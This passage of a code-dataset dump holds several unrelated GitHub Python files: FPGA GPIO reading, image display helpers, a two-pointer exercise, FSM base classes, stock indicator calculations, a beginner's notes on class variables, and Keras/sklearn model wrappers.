fpga.write_int('reset', 1)\n fpga.write_int('reset', 0)\n fpga.write_int('enable',1)\n raw_data = fpga.read('data', 2**15, 0)\n n_lect_in_char = str(n_lectures/8)\n parse_input = struct.unpack('>'+n_lect_in_char+'b', raw_data)\n plt.plot(parse_input)\n plt.show()\n fpga.write_int('enable', 0)\n\nreg_bitsize = 128\naddr = 2**11\nn_lectures = reg_bitsize*addr\nread_gpio(n_lectures)\n \n","repo_name":"seba1224/vector_voltmeter","sub_path":"models/test_gpio/gpio_2/gpio_init.py","file_name":"gpio_init.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"43077280662","text":"#!/usr/bin/env python3\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\nimport matplotlib.pyplot as plt\nimport skimage\nfrom skimage.transform import resize\n\ndef to_multichannel(i):\n if i.shape[2] == 3: return i\n i = i[:,:,0]\n return np.stack((i,i,i), axis=2)\n\ndef DISPLAY(image_data):\n if len(image_data.shape) < 4: image_data 
= image_data.reshape((1, image_data.shape[0], image_data.shape[1], 1))\n\n image_viz = display_images(image_data)\n r, g, b = cv2.split(image_viz)\n image_viz = cv2.merge((b, g, r))\n \n width = image_data.shape[2]\n height = image_data.shape[1]\n image_viz = cv2.resize(image_viz, (width, height), interpolation=cv2.INTER_AREA)\n\n if len(image_data.shape) == 4: image_data = image_data.reshape((image_data.shape[1], image_data.shape[2]))\n\n width = image_data.shape[1]\n height = image_data.shape[0]\n image_data = cv2.resize(image_data, (width, height), interpolation=cv2.INTER_AREA)\n\n return image_data, image_viz\n\ndef display_images(outputs, inputs=None, gt=None, is_colormap=True, is_rescale=True):\n plasma = plt.get_cmap('plasma')\n\n shape = (outputs[0].shape[0], outputs[0].shape[1], 3)\n all_images = []\n\n for i in range(outputs.shape[0]):\n imgs = []\n if isinstance(inputs, (list, tuple, np.ndarray)):\n x = to_multichannel(inputs[i])\n x = resize(x, shape, preserve_range=True, mode='reflect', anti_aliasing=True )\n imgs.append(x)\n\n if isinstance(gt, (list, tuple, np.ndarray)):\n x = to_multichannel(gt[i])\n x = resize(x, shape, preserve_range=True, mode='reflect', anti_aliasing=True )\n imgs.append(x)\n\n if is_colormap:\n rescaled = outputs[i][:,:,0]\n if is_rescale:\n rescaled = rescaled - np.min(rescaled)\n rescaled = rescaled / np.max(rescaled)\n imgs.append(plasma(rescaled)[:,:,:3])\n else:\n imgs.append(to_multichannel(outputs[i]))\n\n img_set = np.hstack(imgs)\n all_images.append(img_set)\n\n all_images = np.stack(all_images)\n\n return skimage.util.montage(all_images, multichannel=True, fill=(0,0,0))","repo_name":"YBNML/humantech","sub_path":"scripts/utils_Display.py","file_name":"utils_Display.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"22957979753","text":"# Given an array and a value, remove all the instances of that value in the array.\n# Also return the number of elements left in the array after the operation.\n# It does not matter what is left beyond the expected length.\n#\n# Example:\n# If array A is [4, 1, 1, 2, 1, 3]\n# and value elem is 1,\n# then new length is 3, and A is now [4, 2, 3]\n# Try to do it in less than linear additional space complexity.\n\nclass Solution:\n\n @staticmethod\n def solution(arr, target):\n size = len(arr)\n i = 0\n j = 0\n while i < size:\n if arr[i] == target:\n i += 1\n else:\n arr[j] = arr[i]\n i += 1\n j += 1\n if j < len(arr):\n del arr[j:]\n return j\n\narr = [4, 1, 1, 2, 1, 3]\ntarget = 3\nres = Solution.solution(arr, target)\nprint(arr)\nprint(res)\n\n","repo_name":"Sauvikk/practice_questions","sub_path":"Level3/Two Pointers/Remove Element from Array.py","file_name":"Remove Element from Array.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23867476873","text":"from abc import abstractstaticmethod\nfrom typing import List\n\n\nclass Singleton(type):\n _instances = {}\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n\nclass FSMError(Exception):\n ...\n\n\nclass InvalidStateTransition(FSMError):\n ...\n\n\nclass BaseState(metaclass=Singleton):\n def __str__(self) -> str:\n return self.__class__.__name__\n\n\nclass BaseFSM:\n \"\"\"\n FSM stores a concrete state recording its current\n 
state\n \"\"\"\n\n curr_state: BaseState = None\n\n def __init__(self, init_state: BaseState, *args, **kwargs) -> None:\n self.curr_state = init_state\n\n\nclass BaseTransition(metaclass=Singleton):\n \"\"\"\n A Transition checks for the FSM's current state\n and decide whether to perform the transition or not.\n \"\"\"\n\n from_state: List[BaseState] = None\n to_state: BaseState = None\n\n @abstractstaticmethod\n def before_state_change(with_fsm: BaseFSM):\n raise NotImplementedError\n\n @abstractstaticmethod\n def after_state_change(with_fsm: \"BaseFSM\"):\n raise NotImplementedError\n\n def __call__(self, fsm: BaseFSM):\n if fsm.curr_state in self.from_state:\n try:\n # actions before state-change\n self.before_state_change(with_fsm=fsm)\n except Exception as e:\n raise InvalidStateTransition(\n f\"Unable to perform the transition from {fsm.curr_state} to {self.to_state}: {e}\"\n )\n\n if fsm.curr_state in self.from_state:\n # state-change\n fsm.curr_state = self.to_state\n # actions after state-change\n try:\n self.after_state_change(with_fsm=fsm)\n except Exception as e:\n raise InvalidStateTransition(\n f\"Unable to perform the transition from {fsm.curr_state} to {self.to_state}: {e}\"\n )\n else:\n return\n raise InvalidStateTransition(\n f\"Unable to perform the transition from {fsm.curr_state} to {self.to_state}: src state is not in {[str(state) for state in self.from_state]}\"\n )\n","repo_name":"xzpjerry/fsm","sub_path":"fsm/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"14425272800","text":"import pandas as pd\nimport numpy as np\nimport pandas_datareader as pdr\nfrom sklearn import preprocessing\n\ngain = lambda x: x if x > 0 else 0 # works as a map function or in list comprehension\nloss = lambda x: abs(x) if x < 0 else 0 # works as a map function or in list comprehension\n\ndef calc_fourier_transform(sentiment_df):\n close_fft = np.fft.fft(np.asarray(sentiment_df['score'].tolist()))\n fft_df = pd.DataFrame({'fft':close_fft})\n fft_df['absolute'] = fft_df['fft'].apply(lambda x: np.abs(x))\n fft_df['angle'] = fft_df['fft'].apply(lambda x: np.angle(x))\n fft_list = np.asarray(fft_df['fft'].tolist())\n\n for num_ in [5, 10, 15, 20]:\n fft_list_m10= np.copy(fft_list); fft_list_m10[num_:-num_]=0\n sentiment_df['fourier '+str(num_)]=np.fft.ifft(fft_list_m10)\n \n return sentiment_df\n\ndef get_ticker_data(start, end, ticker):\n \"\"\"\n Get historical OHLC data for given date range and ticker.\n Tries to get from Investors Exchange (IEX), but falls back\n to Yahoo! 
Finance if IEX doesn't have it.\n\n Parameter:\n - ticker: The stock symbol to lookup as a string.\n\n Returns:\n A pandas dataframe with the stock data.\n \"\"\"\n try:\n print('Getting ticker historical data from IEX')\n data = pdr.DataReader(ticker, 'iex', start, end)\n data.index = pd.to_datetime(data.index)\n except:\n print('Getting ticker historical data from Yahoo')\n data = pdr.get_data_yahoo(ticker, start, end)\n return data \n\ndef calc_bollinger_bands(stock, window=14):\n rolling_mean = stock.Close.rolling(window).mean()\n rolling_std = stock.Close.rolling(window).std()\n rolling_mean_s = stock.sentiment.rolling(window).mean()\n rolling_std_s = stock.sentiment.rolling(window).std()\n upper_band = rolling_mean + (rolling_std*2)\n lower_band = rolling_mean - (rolling_std*2)\n upper_band_s = rolling_mean_s + (rolling_std_s*2)\n lower_band_s = rolling_mean_s - (rolling_std_s*2)\n return upper_band, lower_band, upper_band_s, lower_band_s\n\ndef calc_rsi_ewma_sma(close, window_length):\n delta = close.diff()\n delta = delta[1:] \n up, down = delta.copy(), delta.copy()\n up[up < 0] = 0\n down[down > 0] = 0\n roll_up1 = up.ewm(span=window_length).mean()\n roll_down1 = down.abs().ewm(span=window_length).mean()\n RS1 = roll_up1 / roll_down1\n RSI_EWMA = 100.0 - (100.0 / (1.0 + RS1))\n roll_up2 = up.rolling(window_length).mean()\n roll_down2 = down.abs().rolling(window_length).mean() \n RS2 = roll_up2 / roll_down2\n RSI_SMA = 100.0 - (100.0 / (1.0 + RS2))\n return RSI_EWMA, RSI_SMA","repo_name":"MahirOberai/reddit_sentiment_algotrading","sub_path":"feature_calc.py","file_name":"feature_calc.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"8120262509","text":"#today's topic is the static variable (class-level variable)\r\n#if a variable does not vary from object to object, it is considered a static variable\r\n#it is mostly declared outside of the methods, i.e. directly in the class body\r\n#for the whole class only one copy of a static variable is created and shared with all its objects.\r\n#we can access a static variable either by class name or by object reference, but it is recommended to use the class name\r\n\r\n#places where static variables can be declared:\r\n#directly inside the class, outside the methods\r\n#inside the constructor by using the class name\r\n#inside a method by using the class name\r\n#inside a classmethod by using either the class name or the cls variable\r\n#inside a static method by using the class name.\r\n\r\n\r\n#1.directly inside the class, outside the methods.\r\n\"\"\"\r\nclass Test:\r\n a=\"Himanshu\" #class level variable\r\n def x(self): #instance method\r\n print(\"Hello\",Test.a) #inside the method we access the class-level variable via the class name\r\nt=Test() #here t is an object reference\r\nprint(t.a)\r\nt.x() \r\n\"\"\"\r\n\r\n#2.inside the constructor by using the class name\r\n\"\"\"\r\nclass Test1:\r\n b1=\"my class variable\"\r\n def __init__(self):\r\n self.a=\"instance variable\"\r\n self.b=\"2ns instance variable\"\r\n #to create a class level variable inside the constructor we use classname.variablename\r\n Test1.c=\"i'm class level variable\"\r\n def x1(self):\r\n print(\"test1.c====inside the method\",Test1.c)\r\nq=Test1()\r\nprint(q.a)\r\nprint(q.b1)\r\nprint(q.b)\r\nprint(q.c)\r\n\"\"\"\r\n\r\n#3.Inside the method by using the class name\r\n\"\"\"\r\nclass Test2:\r\n x=\"my class variable\"\r\n def x1(self):\r\n Test2.new=\"i m class lvl but inside the method\"\r\n
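 # Test2.new is created on the class only when x1() runs; reading Test2.new before calling x1() raises AttributeError\r\n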
print(\"sdfs\",Test2.x)\r\n print(\"svsd\",Test2.new)\r\nd=Test2()\r\nprint(d.x)#object reference\r\nprint(Test2.x) #class name\r\n#Test2.new\r\nd.x1()\r\nTest2.new\r\n\"\"\"\r\n\r\n\r\n#4.inside the class method using cls variable\r\n\r\nclass Test3:\r\n a=\"class lvl var\"\r\n def __init__(self):\r\n self.a1=78\r\n self.b1=98 #these are instance level var\r\n Test3.c1=\"i'm class level but inside the constructor\"\r\n def my(self):\r\n Test3.d1=\"class lvl but inside method\"\r\n Test3.e1=\"instance lvl but inside method\"\r\n print(Test3.d1)\r\n print(self.e1)\r\n print(self.a1)\r\n print(Test3.a)\r\n def my1(a,b):\r\n Test3.f=\"i'm class lvl but in static mehtod\"\r\n @classmethod\r\n def my2(cls): #cls=any variable\r\n cls.g=\"i'm class lvl but inside class method\"\r\n Test3.h=\"also in class method but using classname\"\r\n self.t=5\r\n\r\ny=Test3()\r\n\"\"\"print(y.a)\r\nprint(y.b1)\r\nprint(y.a1)\r\n\r\n#Test3.c1()\r\n#Test3.my()#not psossible\"\"\"\r\ny.my()\r\n\r\ny.my1(5)\r\n\r\n","repo_name":"himanshu98-git/python_notes","sub_path":"stetic vriable.py","file_name":"stetic vriable.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25210494346","text":"import sys, os\nROOT_PATH = os.path.abspath(\".\").split(\"src\")[0]\nif ROOT_PATH not in sys.path:\n sys.path.append(ROOT_PATH)\nmodule_path = os.path.abspath(os.path.join(ROOT_PATH+\"/src/utils/\"))\nif module_path not in sys.path:\n sys.path.append(module_path)\n\nfrom sklearn.linear_model import (ElasticNet, ElasticNetCV, LinearRegression, Lasso, LassoCV, Ridge, RidgeCV)\nfrom sklearn.neural_network import MLPRegressor, BernoulliRBM\nfrom sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor, BaggingRegressor, AdaBoostRegressor\nfrom sklearn.svm import LinearSVR\nfrom sklearn.tree import DecisionTreeRegressor\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.engine.input_layer import Input\nfrom keras.regularizers import l2, l1, l1_l2\nfrom keras.preprocessing.sequence import TimeseriesGenerator\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom keras.callbacks.callbacks import ModelCheckpoint\nfrom keras.layers.recurrent import GRU, LSTM\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom copy import deepcopy\n\nimport pickle\nimport numpy as np\nimport tensorflow as tf\nfrom modelFuncs import getRNNSplit\n\nnp.random.seed(100)\ntf.random.set_seed(100)\n\nCURRENT_MODEL_WEIGHTS_FILEPATH = ROOT_PATH + '/src/ml/trained_models/training_weights/'\n\nclass Args():\n def __init__(self, args):\n self.activation = args['activation']\n self.loss = args['loss']\n self.optimizer = args['optimizer']\n self.metrics = args['metrics']\n self.epochs = args['epochs']\n self.batchSize = args['batchSize']\n self.verbose = args['verbose']\n self.callbacks= args['callbacks']\n self.enrolWindow = args['enrolWindow']\n self.validationSize = args['validationSize']\n self.testSize = args['testSize']\n\nclass EnsembleModel():\n def __init__(self, models, X_train, y_train, modelType=\"Ensemble\", name=None):\n maxEnrol = 0\n for model in models:\n if model.args is not None:\n enrol = model.args.enrolWindow\n if enrol is not None and enrol > maxEnrol:\n maxEnrol = enrol\n\n self.maxEnrol = maxEnrol\n self.models = models\n self.MLmodel = None\n self.X_train = X_train\n self.y_train = y_train\n 
self.name = name\n self.history = None\n self.modelType = modelType\n\n def train(self):\n preds = []\n for model in self.models:\n model.train()\n prediction = model.predict(model.X_train, model.y_train)\n if model.modelType == \"RNN\":\n preds.append(prediction[self.maxEnrol - model.args.enrolWindow:])\n else:\n preds.append(prediction[self.maxEnrol:])\n\n train = preds[0]\n for pred in preds[1:]:\n train = np.concatenate((train, pred), axis=1)\n self.MLmodel = sklearnLinear(\n params = { \n 'name': 'Linear model of ensemble',\n 'X_train': train,\n 'y_train': self.y_train[self.maxEnrol:],\n },\n )\n self.MLmodel.train()\n\n def trainEnsemble(self):\n preds = []\n for model in self.models:\n prediction = model.predict(model.X_train, model.y_train)\n if model.modelType == \"RNN\":\n preds.append(prediction[self.maxEnrol - model.args.enrolWindow:])\n else:\n preds.append(prediction[self.maxEnrol:])\n\n train = preds[0]\n for pred in preds[1:]:\n train = np.concatenate((train, pred), axis=1)\n self.MLmodel = sklearnLinear(\n params = {\n 'name': 'Linear model of ensemble',\n 'X_train': train,\n 'y_train': self.y_train[self.maxEnrol:],\n },\n )\n self.MLmodel.train()\n\n def predict(self, X, y):\n preds = []\n for model in self.models:\n prediction = model.predict(X, y)\n if model.modelType == \"RNN\":\n preds.append(prediction[self.maxEnrol - model.args.enrolWindow:])\n else:\n preds.append(prediction[self.maxEnrol:])\n\n test = preds[0]\n for pred in preds[1:]:\n test = np.concatenate((test, pred), axis=1)\n return self.MLmodel.predict(test)\n\n def save(self, directory, name):\n for model in self.models:\n if model.args:\n dirr = directory + name + '/'\n if not os.path.exists(dirr):\n os.makedirs(dirr)\n model.save(dirr, \"_\".join(model.name.split(' ')))\n\nclass MachinLearningModel():\n def __init__(self, model, X_train, y_train, args=None, modelType=None, scaler=\"standard\", name=None):\n if scaler == \"standard\":\n inputScaler = StandardScaler()\n outputScaler = StandardScaler()\n else:\n inputScaler = MinMaxScaler()\n outputScaler = MinMaxScaler()\n \n inputScaler.fit(X_train)\n outputScaler.fit(y_train)\n\n self.model = model\n self.X_train = X_train\n self.y_train = y_train\n self.args = args\n self.name = name\n self.history = None\n self.inputScaler = inputScaler\n self.outputScaler = outputScaler\n self.modelType = modelType\n\n def train(self):\n checkpoint_path = CURRENT_MODEL_WEIGHTS_FILEPATH + \"_\".join(self.name.split(\" \"))\n if not os.path.exists(checkpoint_path):\n os.makedirs(checkpoint_path)\n weights_path = checkpoint_path + \"/current_weights.h5\"\n checkpoint = ModelCheckpoint(\n filepath=weights_path,\n monitor='val_loss',\n verbose=1,\n save_weights_only=True,\n save_best_only=True,\n ),\n\n if self.modelType == \"RNN\":\n \"\"\"\n THIS CODE CAN BE USED IF GENERATORS ARE DESIRED\n NB: not suitable for heat exchanger data,\n because the validation data will not have\n the same properties as the training data\n See thesis for details\n\n X_t, X_v, y_t, y_v = train_test_split(self.X_train, self.y_train, test_size=0.2, shuffle=False)\n validation_generator = TimeseriesGenerator(\n self.inputScaler.transform(X_v),\n self.outputScaler.transform(y_v),\n length = self.args.enrolWindow,\n sampling_rate = 1,\n batch_size = self.args.batchSize\n )\n train_generator = TimeseriesGenerator(\n self.inputScaler.transform(X_t),\n self.outputScaler.transform(y_t),\n length = self.args.enrolWindow,\n sampling_rate = 1,\n batch_size = self.args.batchSize\n )\n 
self.model.compile(\n loss = self.args.loss,\n optimizer = self.args.optimizer,\n metrics = self.args.metrics\n )\n history = self.model.fit_generator(\n train_generator,\n epochs = self.args.epochs,\n verbose = self.args.verbose,\n callbacks = [*self.args.callbacks, *checkpoint],\n validation_data = validation_generator,\n )\n \"\"\"\n # Own implementation of train-val split for RNN data\n X_t, X_v, y_t, y_v = getRNNSplit(\n self.inputScaler.transform(self.X_train),\n self.outputScaler.transform(self.y_train),\n self.args.enrolWindow,\n validation_split=0.2,\n )\n self.model.compile(\n loss = self.args.loss,\n optimizer = self.args.optimizer,\n metrics = self.args.metrics\n )\n history = self.model.fit(\n X_t,\n y_t,\n epochs = self.args.epochs,\n batch_size = self.args.batchSize,\n verbose = self.args.verbose,\n callbacks = [*self.args.callbacks, *checkpoint],\n validation_data = (X_v, y_v),\n )\n self.history = history.history\n self.model.load_weights(weights_path)\n elif self.modelType == \"MLP\":\n self.model.compile(\n loss = self.args.loss,\n optimizer = self.args.optimizer,\n metrics = self.args.metrics\n )\n history = self.model.fit(\n self.inputScaler.transform(self.X_train),\n self.outputScaler.transform(self.y_train),\n epochs = self.args.epochs,\n batch_size = self.args.batchSize,\n verbose = self.args.verbose,\n callbacks = [*self.args.callbacks, *checkpoint],\n validation_split = self.args.validationSize,\n )\n self.history = history.history\n self.model.load_weights(weights_path)\n else:\n history = self.model.fit(\n self.inputScaler.transform(self.X_train),\n self.outputScaler.transform(self.y_train),\n )\n if hasattr(self.model, 'coef_'):\n print(\" Trained weights for \" + self.name + \":\")\n print(str(self.model.coef_))\n self.history = None\n\n def predict(self, X, y=None):\n if self.modelType == \"RNN\":\n test_generator = TimeseriesGenerator(\n self.inputScaler.transform(X),\n self.outputScaler.transform(y),\n length = self.args.enrolWindow,\n sampling_rate = 1,\n batch_size = self.args.batchSize\n )\n return self.outputScaler.inverse_transform(\n self.model.predict(test_generator)\n )\n else:\n return self.outputScaler.inverse_transform(\n self.model.predict(\n self.inputScaler.transform(X)\n )\n )\n\n def predictMultiple(self, X, y, numberOfPredictions=20):\n if self.modelType == \"RNN\":\n predictions = np.zeros((numberOfPredictions, (y.shape[0] - self.args.enrolWindow), y.shape[1]))\n for i in range(numberOfPredictions):\n predictions[i] = self.predict(X, y)\n\n mean = np.array([np.mean(predictions[:,:,i], axis=0) for i in range(y.shape[1])]).T\n standarddev = np.array([np.std(predictions[:,:,i], axis=0) for i in range(y.shape[1])]).T\n \n return [predictions, mean, standarddev]\n else:\n return None\n\n def save(self, directory, name):\n if self.args:\n self.model.save(directory + name + \".h5\")\n with open(directory + name + \".pickle\", 'wb') as file_pi:\n pickle.dump(self.history, file_pi)\n\n\nclass AutoencoderModel():\n def __init__(self, model, X_train, args=None, modelType=\"AUTOENCODER\", scaler=\"standard\", name=None):\n if scaler == \"standard\":\n inputScaler = StandardScaler()\n else:\n inputScaler = MinMaxScaler()\n \n inputScaler.fit(X_train)\n\n self.model = model\n self.X_train = X_train\n self.args = args\n self.name = name\n self.history = None\n self.inputScaler = inputScaler\n self.modelType = modelType\n\n def train(self):\n self.model.compile(\n loss = self.args.loss,\n optimizer = self.args.optimizer,\n metrics = self.args.metrics\n 
)\n history = self.model.fit(\n self.inputScaler.transform(self.X_train),\n self.inputScaler.transform(self.X_train),\n epochs = self.args.epochs,\n batch_size = self.args.batchSize,\n verbose = self.args.verbose,\n callbacks = self.args.callbacks,\n validation_split = self.args.validationSize,\n )\n self.history = history.history\n\n def predict(self, X, y=None):\n return self.inputScaler.inverse_transform(\n self.model.predict(\n self.inputScaler.transform(X)\n )\n )\n\n def save(self, directory, name):\n if self.args:\n self.model.save(directory + name + \".h5\")\n with open(directory + name + \".pickle\", 'wb') as file_pi:\n pickle.dump(self.history, file_pi)\n\ndef ensembleModel(\n params,\n models,\n ):\n\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n\n return EnsembleModel(\n models,\n X,\n Y,\n name=name,\n )\n\ndef kerasLSTM(\n params,\n layers=[128],\n dropout=0.0,\n recurrentDropout=0.0,\n alpha=None,\n training=False,\n ):\n\n X_train = params['X_train']\n y_train = params['y_train']\n name = params['name']\n args = Args(params['args'])\n input_layer = Input(shape=(None,X_train.shape[-1]))\n\n if len(layers) > 1:\n firstLayerUnits = layers[0]\n layer_1 = LSTM(firstLayerUnits,\n activation = args.activation,\n dropout = dropout,\n recurrent_dropout = recurrentDropout,\n return_sequences = True)(input_layer, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n for i, layerUnits in enumerate(layers[1:]):\n layer_1 = LSTM(layerUnits,\n activation = args.activation,\n dropout = dropout,\n recurrent_dropout = recurrentDropout,\n return_sequences = True if (i < len(layers) - 2) else False)(layer_1, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n else:\n firstLayerUnits = layers[0]\n layer_1 = LSTM(firstLayerUnits,\n activation = args.activation,\n dropout = dropout,\n return_sequences = False,\n recurrent_dropout = recurrentDropout)(input_layer, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n\n output_layer = Dense(\n y_train.shape[-1],\n activation='linear')(layer_1)\n \n model = Model(input_layer, output_layer)\n\n return MachinLearningModel(\n model,\n X_train,\n y_train,\n args=args,\n modelType=\"RNN\",\n name=name,\n )\n\ndef kerasGRU(\n params,\n layers=[128],\n dropout=0.0,\n recurrentDropout=0.0,\n alpha=None,\n training=False,\n ):\n\n X_train = params['X_train']\n y_train = params['y_train']\n name = params['name']\n args = Args(params['args'])\n input_layer = Input(shape=(None,X_train.shape[-1]))\n\n if len(layers) > 1:\n firstLayerUnits = layers[0]\n layer_1 = GRU(\n firstLayerUnits,\n activation = args.activation,\n dropout = dropout,\n recurrent_dropout = recurrentDropout,\n return_sequences = True)(input_layer, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n for layerUnits in layers[1:]:\n layer_1 = GRU(\n layerUnits,\n activation = args.activation,\n dropout = dropout,\n recurrent_dropout = recurrentDropout,\n return_sequences = False)(layer_1, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n else:\n firstLayerUnits = layers[0]\n layer_1 = GRU(\n firstLayerUnits,\n activation = args.activation,\n dropout = dropout,\n recurrent_dropout = recurrentDropout)(input_layer, training=training)\n if alpha is not None:\n layer_1 = LeakyReLU(alpha=alpha)(layer_1)\n\n output_layer = Dense(\n y_train.shape[-1],\n activation='linear')(layer_1)\n \n model = 
Model(input_layer, output_layer)\n\n return MachinLearningModel(\n model,\n X_train,\n y_train,\n args=args,\n modelType=\"RNN\",\n name=name,\n )\n\ndef kerasMLP(\n params,\n structure,\n dropout=None,\n l1_rate=0.0,\n l2_rate=0.0,\n ):\n\n X_train = params['X_train']\n y_train = params['y_train']\n name = params['name']\n args = Args(params['args'])\n\n model = Sequential()\n\n firstLayerNeurons, firstLayerActivation = structure[0]\n model.add(\n Dense(\n firstLayerNeurons,\n input_dim=X_train.shape[1],\n activation=firstLayerActivation,\n kernel_regularizer=l1_l2(l1=l1_rate, l2=l2_rate),\n )\n )\n if dropout is not None:\n model.add(Dropout(dropout))\n\n for neurons, activation in structure[1:]:\n model.add(\n Dense(\n neurons,\n activation=activation,\n kernel_regularizer=l1_l2(l1=l1_rate, l2=l2_rate),\n )\n )\n if dropout is not None:\n model.add(Dropout(dropout))\n \n model.add(\n Dense(\n y_train.shape[1],\n activation='linear',\n )\n )\n\n return MachinLearningModel(\n model,\n X_train,\n y_train,\n args=args,\n modelType=\"MLP\",\n name=name,\n )\n\ndef sklearnSVM(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = LinearSVR()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnDecisionTree(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = DecisionTreeRegressor()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnAdaBoost(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = AdaBoostRegressor()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnBagging(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = BaggingRegressor()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnGradientBoosting(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = GradientBoostingRegressor()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnRandomForest(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = RandomForestRegressor()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnMLP(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = MLPRegressor(early_stopping=True)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnLinear(params):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = LinearRegression()\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnLasso(params, alpha=0.1):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = Lasso(alpha=alpha)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnLassoCV(params, alphas=(0.1, 1.0, 10.0), folds=10):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = LassoCV(alphas=alphas, cv=folds)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnRidge(params, alpha=1.0):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = Ridge(alpha=alpha)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnRidgeCV(params, alphas=(0.1, 1.0, 10.0), folds=10):\n X = params['X_train']\n Y = 
params['y_train']\n name = params['name']\n model = RidgeCV(alphas=alphas, cv=folds)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnElasticNet(params, alpha=1.0, l1_ratio=0.5):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = ElasticNet(alpha=alpha, l1_ratio=l1_ratio)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef sklearnElasticNetCV(params, alphas=(0.1, 1.0, 10.0), l1_ratio=0.5, folds=10):\n X = params['X_train']\n Y = params['y_train']\n name = params['name']\n model = ElasticNetCV(alphas=alphas, l1_ratio=l1_ratio, cv=folds)\n return MachinLearningModel(model, X, Y, modelType=\"Linear\", name=name)\n\ndef autoencoder_Dropout(params, dropout=0.2, encodingDim=3):\n X = params['X_train']\n name = params['name']\n args = Args(params['args'])\n\n if encodingDim > 3:\n encodingDim = 3\n\n input_d = Input(shape=(X.shape[1],))\n encoded = Dense(6, activation='tanh')(input_d)\n encoded = Dropout(dropout)(encoded)\n encoded = Dense(5, activation='tanh')(encoded)\n encoded = Dropout(dropout)(encoded)\n encoded = Dense(4, activation='tanh')(encoded)\n encoded = Dropout(dropout)(encoded)\n encoded = Dense(encodingDim, activation='tanh')(encoded)\n #encoded = Dropout(dropout)(encoded)\n decoded = Dense(4, activation='tanh')(encoded)\n #decoded = Dropout(dropout)(decoded)\n decoded = Dense(5, activation='tanh')(decoded)\n #decoded = Dropout(dropout)(decoded)\n decoded = Dense(6, activation='tanh')(decoded)\n #decoded = Dropout(dropout)(decoded)\n decoded = Dense(X.shape[1], activation='linear')(decoded)\n model = Model(input_d, decoded)\n return AutoencoderModel(model, X, args, modelType=\"AUTOENCODER\", name=name)\n\ndef autoencoder_Regularized(params, l1_rate=10e-4, encodingDim=3):\n X = params['X_train']\n name = params['name']\n args = Args(params['args'])\n\n if encodingDim > 3:\n encodingDim = 3\n\n model = Sequential()\n model.add(Dense(X.shape[1]))\n model.add(Dense(6, activation='tanh', activity_regularizer=l1(l1_rate)))\n model.add(Dense(5, activation='tanh', activity_regularizer=l1(l1_rate)))\n model.add(Dense(4, activation='tanh', activity_regularizer=l1(l1_rate)))\n model.add(Dense(encodingDim, activation='tanh', activity_regularizer=l1(l1_rate)))\n model.add(Dense(4, activation='tanh'))\n model.add(Dense(5, activation='tanh'))\n model.add(Dense(6, activation='tanh'))\n model.add(Dense(X.shape[1], activation='linear'))\n return AutoencoderModel(model, X, args, modelType=\"AUTOENCODER\", name=name)","repo_name":"hermanwh/master-thesis","sub_path":"src/utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":22774,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"96"} 